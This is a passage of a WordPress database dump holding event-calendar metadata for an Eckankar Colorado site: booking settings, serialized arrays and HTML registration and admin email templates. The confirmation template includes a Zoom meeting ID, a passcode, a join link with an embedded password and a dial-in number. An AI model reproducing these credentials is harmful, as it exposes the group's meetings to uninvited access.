,267571,'mec_start_time_hour','7'),(173643,267571,'mec_start_time_minutes','0'),(173644,267571,'mec_start_time_ampm','PM'),(173645,267571,'mec_start_day_seconds','68400'),(173646,267571,'mec_end_date','2022-12-29'),(173647,267571,'mec_end_time_hour','8'),(173648,267571,'mec_end_time_minutes','0'),(173649,267571,'mec_end_time_ampm','PM'),(173650,267571,'mec_end_day_seconds','72000'),(173651,267571,'mec_repeat_status','0'),(173652,267571,'mec_repeat_type',''),(173653,267571,'mec_repeat_interval','1'),(173654,267571,'mec_repeat_end',''),(173655,267571,'mec_repeat_end_at_occurrences',''),(173656,267571,'mec_repeat_end_at_date',''),(173657,267571,'mec_advanced_days','a:0:{}'),(173658,267571,'mec_in_days',''),(173659,267571,'mec_not_in_days',''),(173660,267571,'mec_hourly_schedules','a:0:{}'),(173661,267571,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:1:\"1\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(173662,267571,'mec_tickets','a:0:{}'),(173663,267571,'mec_fees_global_inheritance','1'),(173664,267571,'mec_fees','a:0:{}'),(173665,267571,'mec_ticket_variations_global_inheritance','1'),(173666,267571,'mec_ticket_variations','a:0:{}'),(173667,267571,'mec_reg_fields_global_inheritance','1'),(173668,267571,'mec_reg_fields','a:0:{}'),(173669,267571,'mec_bfixed_fields','a:0:{}'),(173670,267571,'mec_op','a:0:{}'),(173671,267571,'mec_fields','a:0:{}'),(173672,267571,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:27:\"Eckankar Event Registration\";s:7:\"content\";s:6107:\"<p>\r\n<style>\r\n    table, td, div, h1, p \r\n      font-family: Arial, sans-serif;\r\n    }\r\n    @media screen and (max-width: 530px) {<br />\r\n      .unsub {<br />\r\n        display: block;<br />\r\n        padding: 8px;<br />\r\n        margin-top: 14px;<br />\r\n        border-radius: 6px;<br />\r\n        background-color: #555555;<br />\r\n        text-decoration: none !important;<br />\r\n        font-weight: bold;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 100% !important;<br />\r\n      }<br />\r\n    }<br />\r\n    @media screen and (min-width: 531px) {<br />\r\n      .col-sml {<br />\r\n        max-width: 27% !important;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 73% !important;<br />\r\n      }<br />\r\n    }<br />\r\n  </style>\r\n</p>\r\n<p>&nbsp;</p>\r\n<div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust: 100%; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; background-color: #ffffff;\" lang=\"en\">\r\n<table style=\"width: 100%; border: none; border-spacing: 0;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0;\" align=\"center\"><!-- [if mso]></p>\r\n<table role=\"presentation\" align=\"center\" style=\"width:600px;\">\r\n<tr>\r\n<td>\r\n<p>          <![endif]-->\r\n<table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 0px 10px 0px; background-color: #ffffff; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\"><img class=\"alignnone wp-image-266520 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2022/03/email-img-registration-597-bluframe-whitetext-9.png\" alt=\"\" width=\"604\" height=\"145\" /></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px 20px 10px 20px; background-color: #f5f5f5; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\">\r\n<p style=\"margin: 0;\"><span style=\"color: #1d5791; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>Event Registration Confirmation</strong></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px 10px 10px 10px; font-size: 0; background-color: #ffffff; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35);\"><!-- [if mso]></p>\r\n<table role=\"presentation\" width=\"100%\">\r\n<tr>\r\n<td style=\"width:145px; padding: 15px 10px 11px 10px;\" align=\"left\" valign=\"top\">\r\n<p>                <![endif]-->\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\">\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px;\"><b>Hello %%first_name%% and thank you for registering!</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 20px;\">You are signed up for the following online event:</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\"><b><span style=\"color: #1d5791;\">Title: </span>%%event_title%%</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\"><b style=\"color: #1d5791;\">Date: </b>%%event_start_date%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\"><b style=\"color: #1d5791;\">Time: </b>%%event_start_time%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 15px;\"> </p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px; color: #1d5791;\"><b>Zoom Login Information:</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\"><b>Meeting ID: </b> 923 1691 4318<br />\r\n<b>Passcode:</b> 938668</p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><a href=\"https://zoom.us/j/92316914318?pwd=VHFxMFJ3T3FhcSt6eUZlejZ6bXRaUT09\">https://zoom.us/j/92316914318?pwd=VHFxMFJ3T3FhcSt6eUZlejZ6bXRaUT09</a></p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><b>Dial-in number: </b>720-707-2699 (for those who need to join by phone)</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">After you click the link, you will be prompted to either download the app to enter the meeting or enter through your browser. Please note that Zoom works best if you download the app. It is more stable and has more functions. Select use computer audio for sound.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">Please join the meeting 5 - 10 minutes ahead of time to help us start on time. We look forward to seeing you at this online event.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">See you there!</p>\r\n</div>\r\n<p><!-- [if mso]>\r\n                </td>\r\n</tr>\r\n</table>\r\n<p>                <![endif]--></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px; font-size: 16px; line-height: 28px; background-color: #efefef; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35); text-align: center;\">You are receiving this email because you have submitted a request through the <a href=\"https://eckankar-colorado.org/\">Eckankar in Colorado</a> website. If you have any questions regarding the origin of this email, please feel free to get in touch, we\'re always happy to help out.</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px; background-color: #6e6e6e;\">\r\n<figure style=\"text-align: center;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </span></figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado -2022</span><br />\r\n<span style=\"font-family: arial, helvetica, sans-serif;\"><a title=\"Contact Us\" href=\"mailto:webmaster@eckankar-colorado.org\"><span style=\"font-size: 14px; line-height: 20px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto; color: #cccccc; margin: 0px;\">Contact Us</span></a></span></figure>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><!-- [if mso]>\r\n          </td>\r\n</tr>\r\n</table>\r\n<p>          <![endif]--></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:22:\"New Event Registration\";s:7:\"content\";s:9924:\"<!-- [if !mso]><!--><!--<![endif]--><!-- [if (gte mso 9)|(IE)]>\r\n\r\n      <xml>\r\n        <o:OfficeDocumentSettings>\r\n          <o:AllowPNG/>\r\n          <o:PixelsPerInch>96</o:PixelsPerInch>\r\n        </o:OfficeDocumentSettings>\r\n      </xml>\r\n      <![endif]--><!-- [if (gte mso 9)|(IE)]>\r\n  \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n<style type=\"text/css\">\r\n    body {width: 600px;margin: 0 auto;}\r\n    table {border-collapse: collapse;}\r\n    table, td {mso-table-lspace: 0pt;mso-table-rspace: 0pt;}\r\n    img {-ms-interpolation-mode: bicubic;}\r\n  </style>\r\n<![endif]-->\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<p>\r\n<style type=\"text/css\">\r\n    body, p, div {\r\n      font-family: inherit;\r\n      font-size: 14px;\r\n    }\r\n    body {\r\n      color: #000000;\r\n    }\r\n    body a {\r\n      color: #1188E6;\r\n      text-decoration: none;\r\n    }\r\n    p { margin: 0; padding: 0; }\r\n    table.wrapper {\r\n      width:100% !important;\r\n      table-layout: fixed;\r\n      -webkit-font-smoothing: antialiased;\r\n      -webkit-text-size-adjust: 100%;\r\n      -moz-text-size-adjust: 100%;\r\n      -ms-text-size-adjust: 100%;\r\n    }\r\n    img.max-width {\r\n      max-width: 100% !important;\r\n    }\r\n    .column.of-2 {\r\n      width: 50%;\r\n    }\r\n    .column.of-3 {\r\n      width: 33.333%;\r\n    }\r\n    .column.of-4 {\r\n      width: 25%;\r\n    }\r\n    ul ul ul ul  {\r\n      list-style-type: disc !important;\r\n    }\r\n    ol ol {\r\n      list-style-type: lower-roman !important;\r\n    }\r\n    ol ol ol {\r\n      list-style-type: lower-latin !important;\r\n    }\r\n    ol ol ol ol {\r\n      list-style-type: decimal !important;\r\n    }\r\n    @media screen and (max-width:480px) {\r\n      .preheader .rightColumnContent,\r\n      .footer .rightColumnContent {\r\n        text-align: left !important;\r\n      }\r\n      .preheader .rightColumnContent div,\r\n      .preheader .rightColumnContent span,\r\n      .footer .rightColumnContent div,\r\n      .footer .rightColumnContent span {\r\n        text-align: left !important;\r\n      }\r\n      .preheader .rightColumnContent,\r\n      .preheader .leftColumnContent {\r\n        font-size: 80% !important;\r\n        padding: 5px 0;\r\n      }\r\n      table.wrapper-mobile {\r\n        width: 100% !important;\r\n        table-layout: fixed;\r\n      }\r\n      img.max-width {\r\n        height: auto !important;\r\n        max-width: 100% !important;\r\n      }\r\n      a.bulletproof-button {\r\n        display: block !important;\r\n        width: auto !important;\r\n        font-size: 80%;\r\n        padding-left: 0 !important;\r\n        padding-right: 0 !important;\r\n      }\r\n      .columns {\r\n        width: 100% !important;\r\n      }\r\n      .column {\r\n        display: block !important;\r\n        width: 100% !important;\r\n        padding-left: 0 !important;\r\n        padding-right: 0 !important;\r\n        margin-left: 0 !important;\r\n        margin-right: 0 !important;\r\n      }\r\n      .social-icon-column {\r\n        display: inline-block !important;\r\n      }\r\n    }\r\n  </style>\r\n</p>\r\n<p>\r\n<style>\r\nbody {font-family: \'Muli\', sans-serif;}\r\n</style>\r\n</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<!--user entered Head Start--><!--End Head user entered--><center class=\"wrapper\" data-link-color=\"#1188E6\" data-body-style=\"font-size:14px; font-family:inherit; color:#000000; background-color:#FFFFFF;\">\r\n<div class=\"webkit\">\r\n<table class=\"wrapper\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" bgcolor=\"#FFFFFF\">\r\n<tbody>\r\n<tr>\r\n<td valign=\"top\" bgcolor=\"#FFFFFF\" width=\"100%\">\r\n<table class=\"outer\" role=\"content-container\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td width=\"100%\">\r\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td><!-- [if mso]>\r\n    <center>\r\n    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n<table>\r\n<tr>\r\n<td width=\"600\">\r\n  <![endif]-->\r\n<table style=\"width: 100%; max-width: 600px;\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0px 0px 0px 0px; color: #000000; text-align: left;\" role=\"modules-container\" align=\"left\" bgcolor=\"#FFFFFF\" width=\"100%\">\r\n<table class=\"module preheader preheader-hide\" style=\"display: none !important; mso-hide: all; visibility: hidden; opacity: 0; color: transparent; height: 0; width: 0;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"preheader\">\r\n<tbody>\r\n<tr>\r\n<td role=\"module-content\">\r\n<p>&nbsp;</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table style=\"padding: 30px 20px 30px 20px;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" bgcolor=\"#f6f6f6\" data-type=\"columns\" data-distribution=\"1\">\r\n<tbody>\r\n<tr role=\"module-content\">\r\n<td valign=\"top\" height=\"100%\">\r\n<table class=\"column column-0\" style=\"width: 540px; border-spacing: 0; border-collapse: collapse; margin: 0px 10px 0px 10px;\" border=\"0\" width=\"540\" cellspacing=\"0\" cellpadding=\"0\" align=\"left\" bgcolor=\"\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0px; margin: 0px; border-spacing: 0;\">\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"6c9e9414-eb30-47e2-97d8-7bd6a4df5990\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 0px 10px 0px; line-height: 24px; text-align: inherit;\" role=\"module-content\" valign=\"top\" bgcolor=\"\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"color: #1d5791; font-family: arial, helvetica, sans-serif; font-size: 36px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto;\">Admin Notification</span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"948e3f3f-5214-4721-a90e-625a47b1c957\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 30px 18px 30px; line-height: 26px; text-align: inherit; background-color: #efefef;\" role=\"module-content\" valign=\"top\" bgcolor=\"#efefef\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"color: #707172; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>New Event Registration</strong></span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a10dcb57-ad22-4f4d-b765-1d427dfddb4e\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 30px 18px 30px; line-height: 22px; text-align: inherit; background-color: #ffffff;\" role=\"module-content\" valign=\"top\" bgcolor=\"#ffffff\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 20px; color: #333333;\"><strong>A new registration has been submitted for the following event:</strong></span></div>\r\n<p>&nbsp;</p>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>%%event_title%%</strong></span></div>\r\n<div></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Date: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_date%%</strong></span></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Time: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_time%%</strong></span> </div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a4e5faa9-7044-47fd-a4a1-b7a1746c258e\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 0px 18px 5px; line-height: 22px; text-align: inherit; background-color: #efefef;\" role=\"module-content\" valign=\"top\" bgcolor=\"#efefef\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"font-size: 14pt;\">%%attendees_full_info%%</span> </div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a265ebb9-ab9c-43e8-9009-54d6151b1600\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 8px 30px 40px 28px; line-height: 22px; text-align: inherit; background-color: #6e6e6e;\" role=\"module-content\" valign=\"top\" bgcolor=\"#6e6e6e\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"></div>\r\n<figure style=\"text-align: center;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px;\">© Eckankar In Colorado -2022</span></figure>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<!-- [if mso]>\r\n                                  </td>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                                </tr>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                              </table>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                            </center>\r\n                            <![endif]--></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</center>\";}}'),(173673,267571,'mec_event_status','EventScheduled'),(173674,267571,'mec_moved_online_link',''),(173675,267571,'mec_cancelled_reason',''),(173676,267571,'mec_display_cancellation_reason_in_single_page',''),(173677,267571,'protect_children',''),(173678,267571,'passster_activate_global_protection',NULL),(173679,267571,'passster_activate_protection',NULL),(173680,267571,'passster_protection_type','password'),(173681,267571,'boldgrid_hide_page_title','0'),(173682,267571,'_thumbnail_id','266472'),(173683,267571,'_oembed_ace4d65561aa575fe8833c60d61f4161','{{unknown}}'),(173684,267571,'boldgrid_in_page_containers','1'),(173686,267571,'_dp_original','266522'),(173687,267571,'_edit_lock','1671044398:2'),(173688,267571,'_edit_last','2'),(173689,267573,'protect_children',''),(173690,267573,'mec_color',''),(173691,267573,'mec_location_id','166'),(173692,267573,'mec_dont_show_map','0'),(173693,267573,'mec_organizer_id','1'),(173694,267573,'mec_start_date','2023-01-14'),(173695,267573,'mec_start_time_hour','10'),(173696,267573,'mec_start_time_minutes','30'),(173697,267573,'mec_start_time_ampm','AM'),(173698,267573,'mec_start_day_seconds','37800'),(173699,267573,'mec_end_date','2023-01-14'),(173700,267573,'mec_end_time_hour','11'),(173701,267573,'mec_end_time_minutes','30'),(173702,267573,'mec_end_time_ampm','AM'),(173703,267573,'mec_end_day_seconds','41400'),(173704,267573,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-01-14\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-01-14\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(173705,267573,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(173706,267573,'mec_certain_weekdays','a:0:{}'),(173707,267573,'mec_allday','0'),(173708,267573,'mec_hide_time','0'),(173709,267573,'mec_hide_end_time','0'),(173710,267573,'mec_comment',''),(173711,267573,'mec_repeat_status','0'),(173712,267573,'mec_repeat_type',''),(173713,267573,'mec_repeat_interval','1'),(173714,267573,'mec_repeat_end',''),(173715,267573,'mec_repeat_end_at_occurrences',''),(173716,267573,'mec_repeat_end_at_date',''),(173717,267573,'mec_advanced_days','a:0:{}'),(173718,267573,'mec_in_days',''),(173719,267573,'mec_not_in_days',''),(173720,267573,'mec_hourly_schedules','a:0:{}'),(173721,267573,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(173722,267573,'mec_tickets','a:0:{}'),(173723,267573,'mec_fees_global_inheritance','1'),(173724,267573,'mec_fees','a:0:{}'),(173725,267573,'mec_ticket_variations_global_inheritance','1'),(173726,267573,'mec_ticket_variations','a:0:{}'),(173727,267573,'mec_reg_fields_global_inheritance','1'),(173728,267573,'mec_reg_fields','a:0:{}'),(173729,267573,'mec_op','a:0:{}'),(173730,267573,'mec_event_date_submit','20210422105713'),(173731,267573,'mec_read_more',''),(173732,267573,'mec_more_info',''),(173733,267573,'mec_more_info_title',''),(173734,267573,'mec_more_info_target','_self'),(173735,267573,'mec_cost',''),(173736,267573,'mec_currency','a:0:{}'),(173737,267573,'mec_additional_organizer_ids','a:0:{}'),(173738,267573,'mec_additional_location_ids','a:0:{}'),(173739,267573,'one_occurrence','0'),(173740,267573,'mec_timezone','global'),(173741,267573,'mec_countdown_method','global'),(173742,267573,'mec_public','1'),(173743,267573,'mec_bfixed_fields','a:0:{}'),(173744,267573,'mec_fields','a:0:{}'),(173745,267573,'mec_event_status','EventScheduled'),(173746,267573,'mec_moved_online_link',''),(173747,267573,'mec_cancelled_reason',''),(173748,267573,'mec_display_cancellation_reason_in_single_page',''),(173749,267573,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(173750,267573,'passster_activate_global_protection',NULL),(173751,267573,'passster_activate_protection',NULL),(173752,267573,'passster_protection_type','password'),(173753,267573,'_wp_old_date','2022-01-18'),(173754,267573,'boldgrid_in_page_containers','1'),(173757,267573,'_dp_original','266827'),(173756,267573,'_oembed_feb482e9f1973a04e96ed04d346ebf98','{{unknown}}'),(173758,267573,'_edit_lock','1671300084:15'),(173759,267573,'_edit_last','15'),(173760,267574,'_wp_attached_file','2022/12/HU.webp'),(173761,267574,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:676;s:6:\"height\";i:380;s:4:\"file\";s:15:\"2022/12/HU.webp\";s:8:\"filesize\";i:7520;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:15:\"HU-300x169.webp\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:3654;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:15:\"HU-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:2098;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:15:\"HU-300x300.webp\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:3932;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:15:\"HU-474x324.webp\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:6674;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:15:\"HU-391x260.webp\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:5318;}s:8:\"tileview\";a:5:{s:4:\"file\";s:15:\"HU-300x380.webp\";s:5:\"width\";i:300;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:3962;}}s:10:\"image_meta\"